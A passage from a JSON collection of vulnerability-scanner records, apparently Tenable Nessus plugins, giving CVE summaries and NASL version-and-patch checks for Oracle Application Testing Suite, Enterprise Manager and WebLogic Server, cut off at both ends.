\"binutils-debuginfo-2.30-5.ph1\",\n \"binutils-devel-2.30-5.ph1\"\n];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"PhotonOS-1.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache / binutils\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:27:31", "description": "The version of Oracle Application Testing Suite installed on the remote host is affected by multiple vulnerabilities : \n\n - Enterprise Manager Base Platform Agent Next Gen (Jython) component of Oracle Enterprise Manager Products Suite is easily exploited and can allow an unauthenticated attacker the ability to takeover the Enterprise Manager Base Platform. (CVE-2016-4000)\n\n - Enterprise Manager Base Platform Discovery Framework (OpenSSL) component of Oracle Enterprise Manager Products Suite is easily exploited and can allow an unauthenticated attacker the ability to cause a frequent crash (DoS) of the Enterprise Manager Base Platform. (CVE-2018-0732)\n\n - Enterprise Manager Ops Center Networking (OpenSSL) component of Oracle Enterprise Manager Products Suite is easily exploited and can allow an unauthenticated attacker the ability to cause a frequent crash (DoS) of the Enterprise Manager Ops Center Platform. (CVE-2018-0732)\n\n - Oracle Application Testing Suite Load Testing for Web Apps (Spring Framework) component of Oracle Enterprise Manager Products Suite is easily exploited and can allow an unauthenticated attacker the ability to takeover the Enterprise Manager Base Platform. (CVE-2018-1258)\n\n - Enterprise Manager Base Platform EM Console component is easily exploited by an unauthenticated attacker. Successful attacks can result in unauthorized update, insert, or delete access. 
(CVE-2018-3303)\n\n - Oracle Application Testing Suite Load Testing for Web Apps component is easily exploited by an unauthenticated attacker. Successful attacks can result in unauthorized update, insert, or delete access and a partial denial of service. (CVE-2018-3304)\n\n - Oracle Application Testing Suite Load Testing for Web Apps component is easily exploited by an unauthenticated attacker. Successful attacks can result in unauthorized update, insert, or delete access and a partial denial of service. (CVE-2018-3305)\n\n - Enterprise Manager for Virtualization Plug-In Lifecycle (jackson-databind) component of Oracle Enterprise Manager allows an unauthenticated attacker the ability to takeover Enterprise Manager for Virtualization. (CVE-2018-12023)\n\n - Enterprise Manager for Virtualization Plug-In Lifecycle (jackson-databind) component of Oracle Enterprise Manager allows an unauthenticated attacker the ability to takeover Enterprise Manager for Virtualization. (CVE-2018-14718)\n\n - Enterprise Manager Ops Center Networking (cURL) component of Oracle Enterprise Manager allows an unauthenticated attacker the ability to takeover Enterprise Manager Ops Center. 
(CVE-2018-1000300)", "cvss3": {}, "published": "2019-01-21T00:00:00", "type": "nessus", "title": "Oracle Application Testing Suite Multiple Vulnerabilities (Jan 2019 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-9251", "CVE-2016-4000", "CVE-2018-0732", "CVE-2018-1000300", "CVE-2018-12023", "CVE-2018-1258", "CVE-2018-14718", "CVE-2018-3303", "CVE-2018-3304", "CVE-2018-3305"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:application_testing_suite"], "id": "ORACLE_OATS_CPU_JAN_2019.NASL", "href": "https://www.tenable.com/plugins/nessus/121257", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(121257);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2015-9251\",\n \"CVE-2016-4000\",\n \"CVE-2018-0732\",\n \"CVE-2018-1258\",\n \"CVE-2018-3303\",\n \"CVE-2018-3304\",\n \"CVE-2018-3305\",\n \"CVE-2018-12023\",\n \"CVE-2018-14718\",\n \"CVE-2018-1000300\"\n );\n script_bugtraq_id(\n 104207,\n 104222,\n 104442,\n 105647,\n 105658,\n 105659,\n 106601,\n 106615,\n 106618\n );\n\n script_name(english:\"Oracle Application Testing Suite Multiple Vulnerabilities (Jan 2019 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a web application installed that is affected by \nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle Application Testing Suite installed on the\nremote host is affected by multiple vulnerabilities : \n\n - Enterprise Manager Base Platform Agent Next Gen (Jython) \n component of Oracle Enterprise Manager Products Suite is easily \n exploited and can allow an unauthenticated attacker the ability\n to takeover the Enterprise Manager Base Platform. 
(CVE-2016-4000)\n\n - Enterprise Manager Base Platform Discovery Framework (OpenSSL) \n component of Oracle Enterprise Manager Products Suite is easily \n exploited and can allow an unauthenticated attacker the ability\n to cause a frequent crash (DoS) of the Enterprise Manager Base \n Platform. (CVE-2018-0732)\n\n - Enterprise Manager Ops Center Networking (OpenSSL) component of\n Oracle Enterprise Manager Products Suite is easily exploited \n and can allow an unauthenticated attacker the ability to cause a \n frequent crash (DoS) of the Enterprise Manager Ops Center\n Platform. (CVE-2018-0732)\n\n - Oracle Application Testing Suite Load Testing for Web Apps \n (Spring Framework) component of Oracle Enterprise Manager \n Products Suite is easily exploited and can allow an \n unauthenticated attacker the ability to takeover the Enterprise \n Manager Base Platform. (CVE-2018-1258)\n\n - Enterprise Manager Base Platform EM Console component is easily \n exploited by an unauthenticated attacker. Successful attacks \n can result in unauthorized update, insert, or delete access. \n (CVE-2018-3303)\n\n - Oracle Application Testing Suite Load Testing for Web Apps\n component is easily exploited by an unauthenticated attacker. \n Successful attacks can result in unauthorized update, insert, or \n delete access and a partial denial of service. (CVE-2018-3304)\n\n - Oracle Application Testing Suite Load Testing for Web Apps\n component is easily exploited by an unauthenticated attacker. \n Successful attacks can result in unauthorized update, insert, or \n delete access and a partial denial of service. (CVE-2018-3305)\n\n - Enterprise Manager for Virtualization Plug-In Lifecycle \n (jackson-databind) component of Oracle Enterprise Manager \n allows an unauthenticated attacker the ability to takeover \n Enterprise Manager for Virtualization. 
(CVE-2018-12023)\n\n - Enterprise Manager for Virtualization Plug-In Lifecycle \n (jackson-databind) component of Oracle Enterprise Manager \n allows an unauthenticated attacker the ability to takeover \n Enterprise Manager for Virtualization. (CVE-2018-14718)\n\n - Enterprise Manager Ops Center Networking (cURL) component of \n Oracle Enterprise Manager allows an unauthenticated attacker the \n ability to takeover Enterprise Manager Ops Center. \n (CVE-2018-1000300)\");\n # https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?799b2d05\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the January 2019 Oracle\nCritical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-14718\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:application_testing_suite\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is 
owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_application_testing_suite_installed.nbin\");\n script_require_keys(\"installed_sw/Oracle Application Testing Suite\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"install_func.inc\");\n\napp_name = \"Oracle Application Testing Suite\";\n\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\nohome = install[\"Oracle Home\"];\nsubdir = install[\"path\"];\nversion = install[\"version\"];\n\nfix = NULL;\nfix_ver = NULL;\n\n# individual security patches\nif (version =~ \"^13\\.3\\.0\\.1\\.\")\n{\n fix_ver = \"13.3.0.1.301\";\n fix = \"29172225\";\n}\nelse if (version =~ \"^13\\.2\\.0\\.1\\.\")\n{\n fix_ver = \"13.2.0.1.240\";\n fix = \"29172233\";\n}\nelse if (version =~ \"^13\\.1\\.0\\.1\\.\")\n{\n fix_ver = \"13.1.0.1.427\";\n fix = \"29172239\";\n}\nelse \n{\n # flag all 12.5.0.3.x \n fix_ver = \"12.5.0.3.999999\";\n}\n\n# Vulnerable versions that need the patch\nif (ver_compare(ver:version, fix:fix_ver, strict:FALSE) == -1)\n{\n report =\n '\\n Oracle home : ' + ohome +\n '\\n Install path : ' + subdir +\n '\\n Version : ' + version;\n if (!isnull(fix)) \n {\n report += \n '\\n Required patch : ' + fix +\n '\\n';\n }\n else\n {\n report += \n '\\n Upgrade to 13.1.0.1 / 13.2.0.1 / 13.3.0.1 and apply the ' +\n 'appropriate patch according to the January 2019 Oracle ' +\n 'Critical Patch Update advisory.' 
+\n '\\n';\n }\n security_report_v4(extra:report, port:0, severity:SECURITY_HOLE);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, subdir);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-30T16:16:03", "description": "The version of Oracle Enterprise Manager Cloud Control installed on the remote host is affected by multiple vulnerabilities in Enterprise Manager Base Platform component:\n\n - Networking component of Enterprise Manager Base Platform (Spring Framework) is easily exploited and may allow an unauthenticated, remote attacker to takeover the Enterprise Manager Base Platform.\n (CVE-2018-1258, CVE-2018-11039, CVE-2018-11040, CVE-2018-1257, CVE-2018-15756)\n\n - Agent Next Gen (IBM Java) vulnerability allows unauthenticated, remote attacker unauthorized access to critical data or complete access to all Enterprise Manager Base Platform accessible data. (CVE-2018-1656, CVE-2018-12539)\n\n - An information disclosure vulnerability exists in OpenSSL due to the potential for a side-channel timing attack. An unauthenticated attacker can exploit this to disclose potentially sensitive information. 
(CVE-2018-0734, CVE-2018-0735, CVE-2018-5407)", "cvss3": {}, "published": "2019-04-18T00:00:00", "type": "nessus", "title": "Oracle Enterprise Manager Cloud Control (Apr 2019 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-0734", "CVE-2018-0735", "CVE-2018-11039", "CVE-2018-11040", "CVE-2018-12539", "CVE-2018-1257", "CVE-2018-1258", "CVE-2018-15756", "CVE-2018-1656", "CVE-2018-5407"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:oracle:enterprise_manager"], "id": "ORACLE_ENTERPRISE_MANAGER_APR_2019_CPU.NASL", "href": "https://www.tenable.com/plugins/nessus/124157", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124157);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2018-0734\",\n \"CVE-2018-0735\",\n \"CVE-2018-1257\",\n \"CVE-2018-1258\",\n \"CVE-2018-1656\",\n \"CVE-2018-5407\",\n \"CVE-2018-11039\",\n \"CVE-2018-11040\",\n \"CVE-2018-12539\",\n \"CVE-2018-15756\"\n );\n script_bugtraq_id(\n 104222,\n 104260,\n 105118,\n 105126,\n 105703,\n 105750,\n 105758,\n 105897\n );\n script_xref(name:\"IAVA\", value:\"2019-A-0130\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n\n script_name(english:\"Oracle Enterprise Manager Cloud Control (Apr 2019 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An enterprise management application installed on the remote host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle Enterprise Manager Cloud Control installed on\nthe remote host is affected by multiple vulnerabilities in\nEnterprise Manager Base Platform component:\n\n - Networking component of Enterprise Manager Base Platform (Spring Framework)\n is easily exploited and may allow an unauthenticated, remote attacker 
to takeover\n the Enterprise Manager Base Platform.\n (CVE-2018-1258, CVE-2018-11039, CVE-2018-11040, CVE-2018-1257, CVE-2018-15756)\n\n - Agent Next Gen (IBM Java) vulnerability allows unauthenticated, remote attacker\n unauthorized access to critical data or complete access to all Enterprise Manager\n Base Platform accessible data. (CVE-2018-1656, CVE-2018-12539)\n\n - An information disclosure vulnerability exists in OpenSSL due to the potential\n for a side-channel timing attack. An unauthenticated attacker can exploit\n this to disclose potentially sensitive information. \n (CVE-2018-0734, CVE-2018-0735, CVE-2018-5407)\");\n # https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9166970d\");\n # https://support.oracle.com/rs?type=doc&id=2498664.1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ba7181fa\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the April 2019\nOracle Critical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-1258\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/04/18\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:enterprise_manager\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_enterprise_manager_installed.nbin\");\n script_require_keys(\"installed_sw/Oracle Enterprise Manager Cloud Control\");\n\n exit(0);\n}\n\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('oracle_rdbms_cpu_func.inc');\ninclude('install_func.inc');\n\nproduct = 'Oracle Enterprise Manager Cloud Control';\ninstall = get_single_install(app_name:product, exit_if_unknown_ver:TRUE);\nversion = install['version'];\nemchome = install['path'];\n\npatchid = NULL;\nmissing = NULL;\npatched = FALSE;\nfix = NULL;\n\nif (version =~ '^13\\\\.3\\\\.0\\\\.0(\\\\.[0-9]+)?$')\n{\n patchid = '29433931';\n fix = '13.3.0.0.190416';\n}\nelse if (version =~ '^13\\\\.2\\\\.0\\\\.0(\\\\.[0-9]+)?$')\n{\n patchid = '29433916';\n fix = '13.2.0.0.190416';\n}\nelse if (version =~ '^12\\\\.1\\\\.0\\\\.5(\\\\.[0-9]+)?$')\n{\n patchid = '29433895';\n fix = '12.1.0.5.190416';\n}\n\nif (isnull(patchid))\n audit(AUDIT_HOST_NOT, 'affected');\n\n# compare version to check if we've already adjusted for patch level during detection\nif (ver_compare(ver:version, fix:fix, strict:FALSE) >= 0)\n audit(AUDIT_INST_PATH_NOT_VULN, product, version, emchome);\n\n# Now look for the affected components\npatchesinstalled = find_patches_in_ohomes(ohomes:make_list(emchome));\nif (isnull(patchesinstalled))\n missing = patchid;\nelse\n{\n foreach applied (keys(patchesinstalled[emchome]))\n {\n if (applied == patchid)\n {\n patched = TRUE;\n break;\n }\n else\n 
{\n foreach bugid (patchesinstalled[emchome][applied]['bugs'])\n {\n if (bugid == patchid)\n {\n patched = TRUE;\n break;\n }\n }\n if (patched) break;\n }\n }\n if (!patched)\n missing = patchid;\n}\n\nif (empty_or_null(missing))\n audit(AUDIT_HOST_NOT, 'affected');\n\norder = make_list('Product', 'Version', 'Missing patch');\nreport = make_array(\n order[0], product,\n order[1], version,\n order[2], patchid\n);\nreport = report_items_str(report_items:report, ordered_fields:order);\n\nsecurity_report_v4(port:0, extra:report, severity:SECURITY_WARNING);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-20T15:48:19", "description": "The version of Oracle WebLogic Server installed on the remote host is affected by multiple vulnerabilities:\n\n - An unspecified vulnerability in the Spring Framework allows a low privileged, remote attacker with network access via HTTP to compromise and takeover the Oracle Communications Unified Inventory Management. (CVE-2018-1258) \n - An unspecified vulnerability in the WLS Core Component allows an authenticated low privileged attacker with network access via HTTP to compromise Oracle WebLogic Server, resulting in unauthorized update, insert or delete access to Oracle WebLogic Server accessible data. (CVE-2019-2568)\n\n - An unspecified vulnerability in the WLS Core Component which allows an authenticated, high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server, resulting in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. 
(CVE-2019-2615)\n\n - An unspecified vulnerability in the WLS Core Component which allows an authenticated, high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server, resulting in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data as well as unauthorized update, insert or delete access to some of Oracle WebLogic Server accessible data. (CVE-2019-2618)\n\n - An unspecified vulnerability in the WLS Core Components allows an unauthenticated, remote attacker with network access via T3 to compromise and takeover the Oracle WebLogic Server. (CVE-2019-2645)\n\n - An unspecified vulnerability in the EJB Container allows an unauthenticated, remote attacker with network access via T3 to compromise and takeover the Oracle WebLogic Server. (CVE-2019-2646)\n\n - An unspecified vulnerability in the WLS - Web Services which allows an authenticated, high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server, resulting in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. (CVE-2019-2647) (CVE-2019-2648) (CVE-2019-2649) (CVE-2019-2650)\n\n - An unspecified vulnerability in the WLS Core Component allows an authenticated low privileged attacker with network access via HTTP to compromise Oracle WebLogic Server, resulting in unauthorized update, insert or delete access to Oracle WebLogic Server accessible data. 
(CVE-2019-2658)", "cvss3": {}, "published": "2019-04-18T00:00:00", "type": "nessus", "title": "Oracle WebLogic Server Multiple Vulnerabilities (Apr 2019 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-1258", "CVE-2019-2568", "CVE-2019-2615", "CVE-2019-2618", "CVE-2019-2645", "CVE-2019-2646", "CVE-2019-2647", "CVE-2019-2648", "CVE-2019-2649", "CVE-2019-2650", "CVE-2019-2658"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware", "cpe:/a:oracle:weblogic_server"], "id": "ORACLE_WEBLOGIC_SERVER_CPU_APR_2019.NASL", "href": "https://www.tenable.com/plugins/nessus/124122", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124122);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2018-1258\",\n \"CVE-2019-2568\",\n \"CVE-2019-2615\",\n \"CVE-2019-2618\",\n \"CVE-2019-2645\",\n \"CVE-2019-2646\",\n \"CVE-2019-2647\",\n \"CVE-2019-2648\",\n \"CVE-2019-2649\",\n \"CVE-2019-2650\",\n \"CVE-2019-2658\"\n );\n script_bugtraq_id(\n 104222,\n 107914,\n 107916,\n 107920,\n 107939,\n 107944\n );\n script_xref(name:\"IAVA\", value:\"2019-A-0128\");\n\n script_name(english:\"Oracle WebLogic Server Multiple Vulnerabilities (Apr 2019 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application server installed on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle WebLogic Server installed on the remote host is\naffected by multiple vulnerabilities:\n\n - An unspecified vulnerability in the Spring Framework allows\n a low privileged, remote attacker with network access via HTTP to\n compromise and takeover the Oracle Communications Unified \n Inventory Management. 
(CVE-2018-1258)\n \n - An unspecified vulnerability in the WLS Core Component allows an \n authenticated low privileged attacker with network \n access via HTTP to compromise Oracle WebLogic Server, resulting \n in unauthorized update, insert or delete access to Oracle \n WebLogic Server accessible data. (CVE-2019-2568)\n\n - An unspecified vulnerability in the WLS Core Component which \n allows an authenticated, high privileged attacker with network \n access via HTTP to compromise Oracle WebLogic Server, resulting\n in unauthorized access to critical data or complete access to all\n Oracle WebLogic Server accessible data. (CVE-2019-2615)\n\n - An unspecified vulnerability in the WLS Core Component which \n allows an authenticated, high privileged attacker with network \n access via HTTP to compromise Oracle WebLogic Server, resulting\n in unauthorized access to critical data or complete access to all\n Oracle WebLogic Server accessible data as well as unauthorized \n update, insert or delete access to some of Oracle WebLogic Server \n accessible data. (CVE-2019-2618)\n\n - An unspecified vulnerability in the WLS Core Components allows\n an unauthenticated, remote attacker with network access via T3 to\n compromise and takeover the Oracle WebLogic Server. \n (CVE-2019-2645)\n\n - An unspecified vulnerability in the EJB Container allows\n an unauthenticated, remote attacker with network access via T3 to\n compromise and takeover the Oracle WebLogic Server. \n (CVE-2019-2646)\n\n - An unspecified vulnerability in the WLS - Web Services which \n allows an authenticated, high privileged attacker with network \n access via HTTP to compromise Oracle WebLogic Server, resulting\n in unauthorized access to critical data or complete access to all\n Oracle WebLogic Server accessible data. 
(CVE-2019-2647)\n (CVE-2019-2648) (CVE-2019-2649) (CVE-2019-2650)\n\n - An unspecified vulnerability in the WLS Core Component allows an \n authenticated low privileged attacker with network \n access via HTTP to compromise Oracle WebLogic Server, resulting \n in unauthorized update, insert or delete access to Oracle \n WebLogic Server accessible data. (CVE-2019-2658)\");\n # https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html#AppendixFMW\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?06438612\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the April 2019 Oracle\nCritical Patch Update advisory.\n\nRefer to Oracle for any additional patch instructions or\nmitigation options.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-2658\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/04/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:weblogic_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_weblogic_server_installed.nbin\", \"os_fingerprint.nasl\");\n script_require_keys(\"installed_sw/Oracle WebLogic Server\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\ninclude(\"obj.inc\");\ninclude(\"spad_log_func.inc\");\n\napp_name = \"Oracle WebLogic Server\";\n\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\nohome = install[\"Oracle Home\"];\nsubdir = install[\"path\"];\nversion = install[\"version\"];\n\nfix = NULL;\nfix_ver = NULL;\n\nspad_log(message:\"checking version [\" + version + \"]\");\n# individual security patches\nif (version =~ \"^12\\.2\\.1\\.3($|[^0-9])\")\n{\n fix_ver = \"12.2.1.3.190416\";\n fix = make_list(\"29016089\");\n}\nelse if (version =~ \"^12\\.1\\.3\\.\")\n{\n fix_ver = \"12.1.3.0.190416\";\n fix = make_list(\"29204657\");\n}\nelse if (version =~ \"^10\\.3\\.6\\.\")\n{\n fix_ver = \"10.3.6.0.190416\";\n fix = make_list(\"U5I2\"); # patchid is obtained from the readme and 10.3.6.x assets are different\n}\nelse\n audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, subdir);\n\nspad_log(message:\"checking fix [\" + obj_rep(fix) + \"]\");\nPATCHED=FALSE;\n\n# Iterate over the list of patches and check the install for the patchID\nforeach id (fix)\n{\n spad_log(message:\"Checking fix id: [\" + id +\"]\");\n if (install[id])\n {\n PATCHED=TRUE;\n break;\n }\n}\n\nVULN=FALSE;\nif (ver_compare(ver:version, fix:fix_ver, strict:FALSE) == -1)\n VULN=TRUE;\n\nif (PATCHED || !VULN)\n audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, subdir);\n\nos = get_kb_item_or_exit(\"Host/OS\");\nif ('windows' >< tolower(os))\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n}\nelse port = 
0;\n\nreport =\n '\\n Oracle Home : ' + ohome +\n '\\n Install path : ' + subdir +\n '\\n Version : ' + version +\n '\\n Fixes : ' + join(sep:\", \", fix);\n\nsecurity_report_v4(extra:report, severity:SECURITY_HOLE, port:port);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-12-23T02:29:32", "description": "The version of Oracle Enterprise Manager Cloud Control installed on the remote host is affected by multiple vulnerabilities in Enterprise Manager Base Platform component:\n\n - A deserialization vulnerability in Apache Commons FileUpload allows for remote code execution.\n (CVE-2016-1000031)\n\n - An information disclosure vulnerability exists in OpenSSL due to the potential for a side-channel timing attack.\n An unauthenticated attacker can exploit this to disclose potentially sensitive information. (CVE-2018-0734)\n\n - A denial of service (DoS) vulnerability exists in Apache HTTP Server 2.4.17 to 2.4.34, due to a design error. An unauthenticated, remote attacker can exploit this issue by sending continuous, large SETTINGS frames to cause a client to occupy a connection, server thread and CPU time without any connection timeout coming to effect.\n This affects only HTTP/2 connections. A possible mitigation is to not enable the h2 protocol.\n (CVE-2018-11763).\n\n - Networking component of Enterprise Manager Base Platform (Spring Framework) is easily exploited and may allow an unauthenticated, remote attacker to takeover the Enterprise Manager Base Platform. 
(CVE-2018-1258)", "cvss3": {}, "published": "2019-05-15T00:00:00", "type": "nessus", "title": "Oracle Enterprise Manager Ops Center (Apr 2019 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1000031", "CVE-2018-0161", "CVE-2018-0734", "CVE-2018-0735", "CVE-2018-5407", "CVE-2018-11763", "CVE-2017-9798", "CVE-2018-1258", "CVE-2018-11039", "CVE-2018-11040", "CVE-2018-1257", "CVE-2018-15756"], "modified": "2019-05-17T00:00:00", "cpe": ["cpe:/a:oracle:enterprise_manager_ops_center"], "id": "ORACLE_ENTERPRISE_MANAGER_OPS_CENTER_APR_2019_CPU.NASL", "href": "https://www.tenable.com/plugins/nessus/125147", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125147);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/05/17 9:44:17\");\n\n script_cve_id(\n \"CVE-2016-1000031\",\n \"CVE-2018-0161\",\n \"CVE-2018-0734\",\n \"CVE-2018-0735\",\n \"CVE-2018-5407\",\n \"CVE-2018-11763\",\n \"CVE-2017-9798\",\n \"CVE-2018-1258\",\n \"CVE-2018-11039\",\n \"CVE-2018-11040\",\n \"CVE-2018-1257\",\n \"CVE-2018-15756\"\n );\n\n script_bugtraq_id(\n 93604,\n 100872,\n 103573,\n 104222,\n 104260,\n 105414,\n 105703,\n 105750,\n 105758,\n 105897,\n 107984,\n 107986\n );\n script_xref(name:\"IAVA\", value:\"2019-A-0130\");\n\n script_name(english:\"Oracle Enterprise Manager Ops Center (Apr 2019 CPU)\");\n script_summary(english:\"Checks for the patch ID.\");\n script_set_attribute(attribute:\"synopsis\", value:\n\"An enterprise management application installed on the remote host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle Enterprise Manager Cloud Control installed on\nthe remote host is affected by multiple vulnerabilities in\nEnterprise Manager Base Platform component:\n\n - A deserialization vulnerability in Apache Commons\n 